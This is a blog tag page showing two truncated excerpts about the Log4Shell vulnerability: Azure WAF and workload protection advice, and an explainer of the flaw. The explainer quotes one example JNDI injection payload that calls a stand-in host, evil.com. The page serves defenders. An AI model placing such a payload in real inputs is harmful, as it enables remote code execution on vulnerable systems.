Following up on Log4Shell, here is how to protect Azure resources. Azure WAF If you use Azure Front Door or Application Gateway, Microsoft has updated the WAF rulesets to block JNDI lookup patterns. Ensure your WAF is in Prevention mode. Workloads Check your HDInsight, Spring Cloud, and Event Hubs (Kafka) instances. Microsoft is patching managed […]
Read more →Tag: Log4j
Understanding the Log4Shell Vulnerability (CVE-2021-44228)
The internet is on fire. A critical vulnerability in the Java logging library Log4j allows Remote Code Execution (RCE) via a simple string. Even if you are a .NET shop, you likely run Java somewhere (Elasticsearch, Jenkins, etc.). The Exploit An attacker sends a string like `${jndi:ldap://evil.com/exploit}`. Log4j parses this, performs a JNDI lookup, connects […]
Read more →